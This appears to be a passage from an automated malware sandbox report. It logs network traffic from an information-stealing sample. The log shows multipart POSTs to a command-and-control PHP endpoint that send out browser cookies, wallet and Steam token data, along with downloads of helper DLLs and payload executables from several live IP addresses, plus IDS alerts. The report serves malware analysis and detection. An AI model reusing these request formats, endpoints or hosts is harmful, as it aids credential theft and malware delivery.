65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 2d 2d 0d 0a Data Ascii: ------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="message"browsers------ECFCBFBGDBKJKECAAKKF--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="message"plugins------HJDBFBKKJDHJKECBGDAK--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="message"fplugins------CGIDAAAKJJDBGCBFCBGI--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFIHost: 185.215.113.206Content-Length: 5751Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDGHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 2d 2d 0d 0a Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JKEHIIJJECFHJKECFHDG--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="file"------KKJDGDHIDBGIECBGHJDB--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCAAKFBAEGDGCBGCGHHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="file"------BGCBGCAFIIECBFIDHIJK--
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 2d 2d 0d 0a Data Ascii: ------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="message"wallets------EBGDAAKJJDAAKFHJKJKF--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 2d 2d 0d 0a Data Ascii: ------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="message"files------CFCBFHJECAKEHIECGIEB--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 2d 2d 0d 0a Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file"------BKJKJEHJJDAKECBFCGID--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="message"ybncbhylepme------KKEHIEBKJKFIEBGDGDAA--
              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KEHDHIDAEHCFHJJJJECA--
              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
              Source: global trafficHTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
              Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
              Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
              Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49773 -> 185.215.113.206:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49901 -> 185.215.113.16:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50101 -> 31.41.244.11:80
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
